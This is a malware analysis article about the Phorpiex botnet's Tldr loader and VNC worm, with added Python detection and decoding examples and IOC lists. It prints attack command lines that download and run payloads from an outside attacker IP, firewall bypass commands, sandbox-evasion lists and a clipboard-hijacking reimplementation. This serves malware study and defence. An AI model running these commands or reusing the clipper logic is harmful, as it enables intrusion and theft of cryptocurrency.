2025-04-05 Update From: SLTechnology News&Howtos shulou
Shulou (Shulou.com) 05/31 Report
This article walks through a technical analysis of the Phorpiex botnet, in the hope that it helps readers facing the same question find a simple and practical approach.
Summary
At the heart of the Phorpiex botnet is a loader called Tldr. It is responsible for loading the other malicious modules, and other malware, onto the infected computer. Each module is a separate Windows executable. Phorpiex modules are usually very small and simple. The malware configuration (typically C&C server addresses, cryptocurrency wallets and URLs of malicious payloads) is hard-coded in the executable. When the configuration needs to be updated, the botnet simply pushes a new module to the infected computer. Modules are updated frequently with minor changes. The following module types were discovered during 2019:
Loader Phorpiex Tldr.
VNC Worm Module.
NetBIOS Worm Module.
XMRig Silent Miner.
Spam Module: Self-spreading and Sextortion
Auxiliary modules (small modules for target location and trace cleaning).
Three of these modules (Tldr, the VNC worm and the NetBIOS worm) can self-propagate. For example, Tldr has file-virus functionality and can infect other executables. The VNC worm connects to VNC servers protected by weak passwords and tries to infect them by simulating user input. This first part analyses two modules in detail: the Phorpiex Tldr loader and the VNC worm module.
Phorpiex Tldr
Tldr ("TrikLoader") is one of the key parts of the Phorpiex botnet infrastructure.
When the malware was first discovered, its relationship to other botnets could not be established. But its binaries, mutex names and sandbox-evasion techniques show that this malware and the Phorpiex Trik IRC bot were developed by the same group of cybercriminals, and several overlaps were found between the Trik and Tldr C&C servers.
At present there are many Phorpiex Tldr versions, each with different functionality. The analysis focuses on the features they share, and especially on the features added in the latest versions (since July 2019). The main purpose of Tldr is to download and execute other modules and malware on the infected computer. Tldr can also spread itself, in the manner of a worm or file virus, and can infect other software.
Evasion techniques
Phorpiex Tldr uses a simple sandbox-evasion technique. On start-up it calls the GetModuleHandle API function to check whether one of the following modules is loaded in its process:
SBIEDLL.DLL
SBIEDLLX.DLL
WPESPY.DLL
DIR_WATCH.DLL
API_LOG.DLL
DIR_WATCH.DLL
PSTOREC.DLL
It then enumerates the running processes and checks to see if the process file name is one of the following:
VBOXSERVICE.EXE
VBOXTRAY.EXE
VMTOOLSD.EXE
VMWARETRAY.EXE
VMWAREUSER
VMSRVC.EXE
VMUSRVC.EXE
PRL_TOOLS.EXE
XENSERVICE.EXE
Older versions of Tldr (TldrV3, May 2018) also enumerate the running processes and check whether the process name is one of the following:
Python.exe
Pythonw.exe
Prl_cc.exe
Vboxservice.exe
Vboxcontrol.exe
Tpautoconnsvc.exe
Finally, Tldr calls the IsDebuggerPresent API function to check whether it is being debugged. If any of these checks indicates a sandbox or a debugger, Tldr stops executing.
Initialization
The initialization steps are very similar to those of Phorpiex Trik. To prevent multiple Phorpiex Tldr instances from running, it creates a mutex with a specific hard-coded name. Earlier versions used the version number as the mutex name, such as "TldrV3". In the latest versions each campaign has a different mutex name, usually consisting of several digits, such as "6486894".
The next step is the same for all Phorpiex samples: deleting the ":Zone.Identifier" alternate data stream. This removes the mark that identifies the file as coming from an untrusted source (the "mark of the web") and the warnings that go with it. Versions since July 2019 (Tldr v5.0) also acquire the debug privilege.
Persistence
Tldr copies itself into the following folders:
%windir%
%userprofile%
%systemdrive% (only in versions from July 2019)
%temp%
For Phorpiex Tldr v3, the chosen paths and file names are the same as in Phorpiex Trik. Tldr creates a subfolder under these paths whose name starts with "T-" (in Phorpiex Trik the name starts with "M-") and copies its executable into it. For example:
C:\WINDOWS\Tmur9759504507674060850740\winsvc.exe
Unlike Phorpiex Tldr v3, newer versions create the copy only if the running file's name does not contain the substring "sys", i.e. when the executable is not already the installed copy. They use a subfolder name generated from a random number and a file name that begins with "sys" followed by four random letters:
C:\WINDOWS\2813528135\sysjekp.exe
Phorpiex Tldr sets the attributes FILE_ATTRIBUTE_READONLY, FILE_ATTRIBUTE_HIDDEN and FILE_ATTRIBUTE_SYSTEM on the created files and subfolders. It then configures autorun through the registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Tldr creates the new registry value with a hard-coded name; in the studied sample the name is "Windows Operating System".
It adds a firewall exception for itself through the registry key:
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
Bypassing Windows security measures
Phorpiex Tldr versions since July 2019 (Tldr v5) disable Windows security features such as Windows Defender, security notifications and System Restore by setting registry values.
Main function
Phorpiex Tldr creates a separate thread for each malicious activity.
Crypto Clipper
All samples contain the ability to steal cryptocurrency by replacing wallet addresses in the clipboard of the infected system. The malware calls the API functions OpenClipboard and GetClipboardData to read the clipboard every 200 ms. To decide whether the clipboard contains a cryptocurrency wallet address, Phorpiex Tldr applies the following checks:
1. The first character is one of: 1, 3, Q, 2, X, D, 0, L, 4, P, t, z, G, U, E
2. The length is 25 to 45 characters, or exactly 9 characters, or 90 to 115 characters
3. The text does not contain O (0x4F), I (0x49) or l (0x6C)
4. The text contains only digits and letters
If any check fails, the clipboard is left unchanged. Otherwise Tldr determines the wallet address type and replaces the address with one of its hard-coded values. The type is determined by the first character of the clipboard data.
Supported cryptocurrency types include:
Bitcoin
Bitcoin Cash
Ethereum
DASH
Dogecoin
Litecoin
Monero
Zcash
Crypto Clipper also handles Perfect Money wallets (gold, US dollars, euros):
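The four clipboard checks above, reimplemented in Python as an added example (this is not the malware's code and not part of the original analysis). The character set and length ranges are the ones reported; the mapping from first character to currency is an assumption based on public address formats (the sample's own table is not reproduced on this page, so characters such as Q, 2 and P are left as "unknown"), and all addresses below are constructed, not real wallets. Running the checks over a few strings shows which clipboard contents the clipper would swap and which it would leave alone, which is useful when writing a detection or a honey-clipboard test.

```python
import re
from typing import Optional

# Checks as described in the analysis; the type mapping is an assumption.
FIRST_CHARS = set("13Q2XD0L4PtzGUE")
FORBIDDEN = set("OIl")            # characters Base58 never uses
ALNUM = re.compile(r"^[A-Za-z0-9]+$")

ADDRESS_TYPE_BY_FIRST_CHAR = {    # assumption, derived from public address formats
    "1": "bitcoin", "3": "bitcoin", "0": "ethereum", "X": "dash",
    "D": "dogecoin", "L": "litecoin", "4": "monero", "t": "zcash",
    "z": "zcash", "U": "perfectmoney_usd", "E": "perfectmoney_eur",
    "G": "perfectmoney_gold",
}


def looks_like_wallet(text: str) -> bool:
    """Apply the four checks in order; any failure leaves the clipboard alone."""
    if not text or text[0] not in FIRST_CHARS:            # 1. first character
        return False
    n = len(text)
    if not (25 <= n <= 45 or n == 9 or 90 <= n <= 115):   # 2. length
        return False
    if FORBIDDEN & set(text):                             # 3. no O, I, l
        return False
    return ALNUM.fullmatch(text) is not None              # 4. ASCII alphanumerics only


def wallet_type(text: str) -> Optional[str]:
    """None when the text is not treated as a wallet, else the assumed type."""
    if not looks_like_wallet(text):
        return None
    return ADDRESS_TYPE_BY_FIRST_CHAR.get(text[0], "unknown")


def clip_swap(clipboard: str, attacker_wallets: dict) -> str:
    """What the clipper writes back: the attacker's address for a recognised
    type it has a replacement for, otherwise the original text unchanged."""
    kind = wallet_type(clipboard)
    if kind is None or kind not in attacker_wallets:
        return clipboard
    return attacker_wallets[kind]


# Constructed attacker addresses and constructed clipboard contents (not real wallets).
ATTACKER = {"bitcoin": "1" + "A" * 33, "ethereum": "0x" + "ab12" * 10, "monero": "4" + "b9" * 47}
SAMPLES = {
    "btc": "1AbCdEfGhJkMnPqRsTuVwXyZ2345678901",   # 34 chars, passes all checks
    "eth": "0x" + "c0de" * 10,                     # 42 chars, first char "0"
    "xmr": "4" + "A1" * 47,                        # 95 chars, Monero length band
    "pm_usd": "U12345678",                         # 9 chars, Perfect Money style
    "prose": "please send 1 bitcoin to my address", # fails check 1 and 4
    "bad_chars": "1Il" + "a" * 30,                 # fails check 3
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(f"{label:10} type={wallet_type(text)!s:18} written_back={clip_swap(text, ATTACKER)}")
```

The sample's real decision table may differ in detail; what matters for a detector is that the heuristic is purely syntactic, so a test string such as the constructed ones above is enough to confirm a clipper is active on a host.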
Self-spreading
The file-worm functionality is implemented in this thread. In an infinite loop, Tldr enumerates the available drives with GetLogicalDrives. It reads the "NoDrives" value of the registry key "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", excludes the drives hidden by the NoDrives Explorer policy from the enumeration, and selects removable and remote drives. On each selected drive it creates a folder named "__" and sets the attributes FILE_ATTRIBUTE_READONLY, FILE_ATTRIBUTE_HIDDEN and FILE_ATTRIBUTE_SYSTEM so that it is invisible in Explorer.
The malware copies itself into this folder under a hard-coded name ("DriveMgr.exe" in the example). Tldr then reads the volume name of the selected drive and creates a shortcut named "{volume_name}.lnk" in the root of the drive that runs:
%windir%\system32\cmd.exe /c start __ & __\DriveMgr.exe & exit
Tldr then moves all folders from the root of the selected drive into the "__" folder. It also deletes all files in the root with the following extensions:
*.lnk, *.vbs, *.bat, *.js, *.scr, *.com, *.jse, *.cmd, *.pif, *.jar, *.dll, *.vbe, *.inf
The likely reason is to disable other worms on the same drive. Tldr v5.0 introduced a new feature that lets the malware infect other executables; previously Phorpiex used separate modules for this. The malware scans all folders on removable and remote drives and infects every .exe file that is not already infected.
To infect a PE file, Tldr makes the following modifications: it increments the number of sections in the PE header and sets the header's TimeDateStamp to 0x0000DEAD.
The malware also uses the TimeDateStamp value to detect whether a file is already infected. The value 0x0000DEAD corresponds to the timestamp 1970-01-01 15:50:05. Infected samples can easily be found on VirusTotal with the following query:
pets:1970-01-01T15:50:05
Tldr also adds a new code section named ".zero" and copies the malicious payload into it. The entry point is modified to point to the start of the new section. The malware does not recalculate the PE checksum; it simply resets it to 0.
The malware writes its relative address into the main code:
A placeholder value of 0xCCCCCCCC in the template function marks the place where the original entry point is written:
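A header-only triage check for the infection marker described above, written for this page as an added example (it is not the malware's code and not a tool from the original analysis). It reads the PE headers with struct alone, so it needs no third-party module, and reports the four traits the text attributes to files infected by Tldr v5: TimeDateStamp == 0x0000DEAD, a section named ".zero", an entry point inside the last section, and a zeroed checksum. The build_sample_pe helper fabricates a minimal PE32 header image so the scanner can be exercised offline; that image is constructed, not a real sample, and a real file would be read from disk instead.

```python
import struct
from datetime import datetime, timezone

PHORPIEX_STAMP = 0x0000DEAD   # TimeDateStamp written by the infector


def _sections(data: bytes, sec_off: int, count: int):
    """Return (name, VirtualAddress, effective size) for each section header."""
    out = []
    for i in range(count):
        name, vsize, vaddr, rsize, _rptr = struct.unpack_from("<8sIIII", data, sec_off + 40 * i)
        out.append((name.rstrip(b"\0").decode("latin-1"), vaddr, max(vsize, rsize)))
    return out


def pe_infection_indicators(data: bytes) -> dict:
    """Parse DOS, COFF and optional headers and report the Tldr v5 infection traits."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsec, stamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (entry,) = struct.unpack_from("<I", data, opt + 16)     # AddressOfEntryPoint (PE32 and PE32+)
    (checksum,) = struct.unpack_from("<I", data, opt + 64)  # CheckSum (PE32 and PE32+)
    secs = _sections(data, opt + opt_size, nsec)
    _last_name, last_va, last_size = secs[-1]
    return {
        "timestamp": stamp,
        "timestamp_utc": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "timestamp_dead": stamp == PHORPIEX_STAMP,
        "has_zero_section": any(s[0] == ".zero" for s in secs),
        "ep_in_last_section": last_va <= entry < last_va + last_size,
        "checksum_zero": checksum == 0,
        "sections": [s[0] for s in secs],
    }


def is_phorpiex_infected(data: bytes) -> bool:
    """The marker alone is what the malware keys on; requiring the appended
    section as well avoids flagging unrelated files with odd timestamps."""
    ind = pe_infection_indicators(data)
    return ind["timestamp_dead"] and ind["has_zero_section"]


def build_sample_pe(infected: bool) -> bytes:
    """Constructed, header-only PE32 image for testing the scanner (not executable,
    not from a real sample). The infected variant mimics the modifications above."""
    names = [b".text", b".data"] + ([b".zero"] if infected else [])
    opt_size = 96                                    # PE32 optional header, no data directories
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(names),
                       PHORPIEX_STAMP if infected else 0x5D4A0000, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<I", opt, 16, 0x3000 if infected else 0x1000)   # entry point
    struct.pack_into("<I", opt, 64, 0 if infected else 0x1234)        # checksum
    secs = b"".join(
        struct.pack("<8sIIIIIIHHI", n.ljust(8, b"\0"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 * (i + 1), 0, 0, 0, 0, 0x60000020)
        for i, n in enumerate(names))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs


if __name__ == "__main__":
    for label, blob in (("clean", build_sample_pe(False)), ("infected", build_sample_pe(True))):
        print(label, pe_infection_indicators(blob), "->", is_phorpiex_infected(blob))
```

On a real file, pass the bytes read from disk to pe_infection_indicators; the VirusTotal "pets:" query above is the same test applied across the corpus, and the extra indicators help confirm a hit once the file is in hand.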
Shellcode
The shellcode inserted into infected files consists of several functions. It uses no absolute addresses, so it runs correctly wherever it is placed in memory.
First, the shellcode checks whether the file "%appdata%\winsvcs.txt" exists. If the file exists, the shellcode does nothing except transfer control to the original entry point of the infected program; if it does not exist, another file is downloaded and executed from a hard-coded URL:
The file is downloaded with URLDownloadToFileW into a temporary file whose name is obtained with GetTempPathW and GetTempFileNameW. If the download succeeds, the shellcode removes the ":Zone.Identifier" ADS from the file and executes it with CreateProcessW.
C&C check-in
When run for the first time, Phorpiex Tldr sends HTTP requests to the C&C servers in its hard-coded list:
Tldr creates one thread per C&C server. Before starting the threads, the malware creates an empty file "%appdata%\winsvcs.txt". This file serves as a flag indicating whether the malware is running for the first time; if it already exists, no threads are created.
In each thread the malware requests the following URL (the host is the C&C server):
http://<c2>/t.php?new=1
URLs in other formats can be seen in other samples, for example:
http://<c2>/tldr.php?new=1
http://<c2>/tldr.php?on=1
http://<c2>/tldr.php?new=1&id=
http://<c2>/tldr.php?new=1&on=
For these requests Phorpiex Tldr uses a specific hard-coded value for the User-Agent header. The value used since July 2019 is:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
The value in older versions:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
The resulting HTTP request looks as follows:
Main thread
The primary purpose of Phorpiex Tldr is to download and execute other malicious payloads on infected hosts. It uses hard-coded paths (usually 4 to 8 of them) to build the download URLs:
http://<c2>/1.exe
http://<c2>/2.exe
For each generated URL, the malware first checks availability and size with InternetOpenUrlA and HttpQueryInfoA. If the URL is available, Tldr stores the content length for that path. If the size equals the previously stored value, the URL is skipped so the same payload is not downloaded again. If the URL is available and its content length differs from the previous value, Tldr downloads and executes it. The downloaded file is saved in the %temp% folder under a name built as:
"%d.exe" % random.randint(10000, 40000)
Tldr makes two attempts to download the file: first with InternetOpenUrlW/InternetReadFile, and if that fails, with URLDownloadToFileW. After downloading, Phorpiex Tldr deletes the ":Zone.Identifier" stream. It then makes two attempts to execute the downloaded file: with CreateProcess first, and with ShellExecute if that fails.
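Detection logic for the check-in and download traffic described in the two sections above, as an added example (not from the original analysis). The User-Agent strings and URL shapes are the ones listed on this page; the log format is a constructed, space-separated "timestamp client method url status user-agent" layout, and every event in SAMPLE_LOG is invented, with only the hosts taken from the IOC list below. The severity scheme is a design choice of this example: the check-in URL shape is specific enough to stand alone, a bare /N.exe fetch is weak and is only raised when the hard-coded User-Agent corroborates it, and the User-Agent by itself is a common Firefox build and is never treated as evidence.

```python
import re
from urllib.parse import urlsplit

# Hard-coded User-Agent values reported for Tldr (exact strings).
PHORPIEX_USER_AGENTS = {
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
}
# Check-in: /t.php?new=1, /tldr.php?new=1, /tldr.php?on=1, optionally with &id= or &on=.
CHECKIN_RE = re.compile(r"^/(?:t|tldr)\.php\?(?:new|on)=1(?:&(?:id|on)=[^&]*)?$")
# Payload paths seen in the IOC list: /1 .. /7, /1.exe .. /7.exe, /a.exe, /s.exe, /ya.exe.
PAYLOAD_RE = re.compile(r"^/(?:\d{1,2}(?:\.exe)?|[a-z]{1,2}\.exe)$")


def classify_request(url: str, user_agent: str):
    """Return a severity label for one request, or None if nothing matches."""
    parts = urlsplit(url)
    path = parts.path + ("?" + parts.query if parts.query else "")
    if CHECKIN_RE.match(path):
        return "high"        # the check-in shape is specific to this family
    if PAYLOAD_RE.match(path):
        # a short numeric .exe path is weak on its own; the hard-coded UA corroborates it
        return "medium" if user_agent in PHORPIEX_USER_AGENTS else "low"
    return None              # UA alone is a real Firefox release, not evidence


def scan_proxy_log(text: str):
    """Parse the constructed log layout (UA last, so it may contain spaces)
    and return one hit per matching line."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, _status, ua = line.split(" ", 5)
        sev = classify_request(url, ua)
        if sev:
            hits.append({"time": ts, "client": client, "url": url, "severity": sev})
    return hits


# Constructed sample lines (events invented; hosts taken from the IOC list).
SAMPLE_LOG = """\
2019-08-01T10:00:01Z 10.0.0.5 GET http://193.32.161.69/tldr.php?new=1 200 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
2019-08-01T10:00:02Z 10.0.0.5 GET http://193.32.161.69/1.exe 200 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
2019-08-01T10:00:03Z 10.0.0.7 GET http://example.com/index.html 200 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
2019-08-01T10:00:04Z 10.0.0.9 GET http://example.com/1.exe 200 Mozilla/5.0 (X11; Linux x86_64) Chrome/76.0
"""

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

Because Tldr polls the same 4 to 8 paths in a loop and only re-downloads when the Content-Length changes, the HEAD-like availability probes recur at a steady cadence from one client; correlating repeated "low" and "medium" hits per client over time is the natural next step on top of the per-line labels.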
The latest version of Tldr (v5) has been significantly improved: it uses RC4-encrypted payload files with RSA-SHA1 signature verification. The encrypted file header contains the magic bytes "NGS!", the length of the RSA signature, and the RSA signature used to verify the file. The first 16 bytes of the RSA signature are used as the RC4 decryption key:
Phorpiex Tldr decrypts the data with the 16-byte RC4 key taken from the file and then computes the SHA1 hash of the decrypted file. To verify the digital signature, Tldr uses a 4096-bit RSA public key hard-coded into the sample.
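A decryptor for the v5 payload container as the text describes it, written for this page as an added example (it is not the malware's code and not a tool from the original analysis). The exact header layout (4-byte magic, 4-byte little-endian signature length, signature, ciphertext) and the toy 125-bit RSA key pair are assumptions made so the block runs offline; a real sample carries a 4096-bit key, which an analyst would drop in for the verification step. The point worth noticing is that the RC4 key is the first 16 bytes of a signature that is stored in the file itself, so decryption needs no secret at all; only the authenticity check depends on the public key.

```python
import hashlib
import struct

MAGIC = b"NGS!"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _modinv(a: int, m: int) -> int:
    """Modular inverse by extended Euclid (kept explicit instead of pow(a, -1, m))."""
    r0, r1, s0, s1 = m, a % m, 0, 1
    while r1:
        q = r0 // r1
        r0, r1, s0, s1 = r1, r0 - q * r1, s1, s0 - q * s1
    return s0 % m


# Toy textbook-RSA key, constructed for the example only (p = 2**64 - 59 and
# q = 2**61 - 1 are primes). Real samples use a 4096-bit key and 512-byte signatures.
_P, _Q, _E = 2**64 - 59, 2**61 - 1, 65537
_N = _P * _Q
_D = _modinv(_E, (_P - 1) * (_Q - 1))
SIG_LEN = 16                      # toy signature width; long enough to supply the 16-byte RC4 key


def _digest_int(plaintext: bytes) -> int:
    return int.from_bytes(hashlib.sha1(plaintext).digest(), "big") % _N


def toy_sign(plaintext: bytes) -> bytes:
    return pow(_digest_int(plaintext), _D, _N).to_bytes(SIG_LEN, "big")


def toy_verify(plaintext: bytes, sig: bytes) -> bool:
    return pow(int.from_bytes(sig, "big"), _E, _N) == _digest_int(plaintext)


def pack_ngs(plaintext: bytes) -> bytes:
    """Build a container: magic, signature length, signature, RC4(sig[:16], plaintext).
    Field widths and order are an assumption; the key derivation is as described."""
    sig = toy_sign(plaintext)
    return MAGIC + struct.pack("<I", len(sig)) + sig + rc4(sig[:16], plaintext)


def unpack_ngs(blob: bytes) -> bytes:
    """Decrypt first (the key is in the file), then verify the SHA1-over-plaintext signature."""
    if blob[:4] != MAGIC:
        raise ValueError("not an NGS! container")
    (sig_len,) = struct.unpack_from("<I", blob, 4)
    sig = blob[8:8 + sig_len]
    plaintext = rc4(sig[:16], blob[8 + sig_len:])
    if not toy_verify(plaintext, sig):
        raise ValueError("RSA-SHA1 signature check failed")
    return plaintext


if __name__ == "__main__":
    payload = b"MZ constructed payload, not a real module"
    blob = pack_ngs(payload)
    print(blob[:4], len(blob), unpack_ngs(blob) == payload)
```

Note the ordering: the decrypted bytes are hashed and checked before anything is executed, so a payload whose ciphertext was tampered with fails the signature check even though it decrypts without error, which is the property the botnet operators rely on to keep third parties from feeding their own modules to infected hosts.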
VNC Worm module
One of the modules found in Phorpiex is a malicious VNC client. It has no persistence mechanism of its own and is executed by Tldr each time. The malware scans random IP addresses for open VNC ports (5900) and brute-forces the servers it finds with a hard-coded password list. The ultimate goal is to download and execute another piece of malware (usually Phorpiex Tldr) on the target host.
From the very beginning, the Phorpiex VNC worm has used API hammering to evade sandboxes: it performs a large number of meaningless calls to several functions in a loop:
It uses a mutex with a hard-coded name to prevent multiple instances:
The attack itself runs in an infinite loop. The IP addresses to scan are generated randomly with rand(), seeded with GetTickCount. The only filter applied is that an address may not begin with 127, 172 or 192. If a TCP connection to port 5900 succeeds, the VNC worm brute-forces the discovered VNC server with its password list:
The password list may vary from sample to sample. If the attack succeeds, the result is reported to the C&C server using a URL of the following format:
"hxxp://92.63.197.153/result.php?vnc=%s|%s" % (host, password)
Finally, the Phorpiex VNC worm executes several command lines on the victim's computer by simulating keyboard input over the VNC protocol. It runs the following:
cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/vnc.exe','%temp%\48303045850.exe'); Start-Process '%temp%\48303045850.exe'
cmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/vnc.exe %temp%\49405003030.exe&start %temp%\49405003030.exe
cmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe "ok" ENABLE&netsh advfirewall firewall add rule name="ok" dir=in action=allow program="C:\Windows\System32\ftp.exe" enable=yes
cmd.exe /c "cd %temp%&@echo open 92.63.197.153 >>ftpget.txt&@echo tom >>ftpget.txt&@echo hehehe >>ftpget.txt&@echo binary >>ftpget.txt&@echo get vnc.exe >>ftpget.txt&@echo quit >>ftpget.txt&@ftp -s:ftpget.txt&@start vnc.exe"
As a result, the victim's computer downloads and executes the malicious payload from the server over HTTP or FTP:
ftp://tom:hehehe@92.63.197[.]153/vnc.exe
ftp://tom:hehehe@92.63.197[.]153/ohuh.exe
http://92.63.197[.]153/vnc.exe
http://92.63.197[.]153/ohuh.exe
IOCs
Phorpiex Tldr
Phorpiex Tldr C&C IPs and domains
185.176.27.132
193.32.161.69
193.32.161.73
193.32.161.77
92.63.197.153
92.63.197.38
92.63.197.59
92.63.197.60
94.156.133.65
aiiaiafrzrueuedur.ru
fafhoafouehfuh.su
ffoeefsheuesihfo.ru
osheoufhusheoghuesd.ru
ouhfuosuoosrhzfzr.ru
slpsrgpsrhojifdij.ru
unokaoeojoejfghr.ru
b0t.to
thaus.to
thaus.top
Phorpiex Tldr related URLs
hxxp://185.176.27[.]132/a.exe
hxxp://aiiaiafrzrueuedur.ru/o.exe
hxxp://185.176.27[.]132/1
hxxp://185.176.27[.]132/2
hxxp://185.176.27[.]132/3
hxxp://185.176.27[.]132/4
hxxp://185.176.27[.]132/5
hxxp://185.176.27[.]132/6
hxxp://185.176.27[.]132/7
hxxp://193.32.161[.]69/1.exe
hxxp://193.32.161[.]69/2.exe
hxxp://193.32.161[.]69/3.exe
hxxp://193.32.161[.]69/4.exe
hxxp://193.32.161[.]69/5.exe
hxxp://193.32.161[.]69/6.exe
hxxp://193.32.161[.]69/7.exe
hxxp://193.32.161[.]69/ya.exe
hxxp://193.32.161[.]73/1
hxxp://193.32.161[.]73/2
hxxp://193.32.161[.]73/3
hxxp://193.32.161[.]73/4
hxxp://193.32.161[.]73/5
hxxp://193.32.161[.]73/6
hxxp://193.32.161[.]73/s.exe
hxxp://193.32.161[.]77/11.exe
Phorpiex VNC Worm
This concludes the analysis of the Phorpiex botnet's Tldr loader and VNC worm module.
© 2024 shulou.com SLNews company. All rights reserved.